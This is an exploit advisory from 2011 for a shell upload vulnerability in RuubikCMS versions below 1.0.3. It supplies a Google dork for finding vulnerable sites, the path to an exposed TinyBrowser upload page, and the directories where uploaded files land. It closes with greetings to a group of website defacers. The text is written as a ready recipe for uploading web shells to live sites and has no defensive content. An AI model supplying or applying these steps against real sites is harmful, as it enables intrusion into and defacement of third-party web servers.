RuubikCMS < v1.0.3 Shell Upload Vulnerability

2011-03-06 09:15:45

###########################################################################

Exploit Title : RuubikCMS < v1.0.3 Shell Upload Vulnerability

Google Dork : Powered by RuubikCMS

Date : 2011-03-06

Author : Alexander

Software Link : http://www.ruubikcms.com

Version : < v1.0.3

Test On : Linux/php

CVE : Web Applications

###########################################################################

===[ Exploit ]===

http://server/[patch] /tiny_mce/plugins/tinybrowser/tinybrowser.php

Select the Upload And Then Browse File.gif

===[ Upload To ]===

http://server/[patch]/useruploads/images/File.gif

OR

http://server/[patch] /upload/image/File.gif

===[ Demo ]===

http://server/ruubikcms/tiny_mce/plugins/tinybrowser/tinybrowser.php

###########################################################################

Greetz : http://Ashiyane.org/Forums

Behrooz_Ice , Q7X , Virangar , Black And All Ashiyane Defacers

Fixes

No fixes

In order to submit a new fix you need to be registered.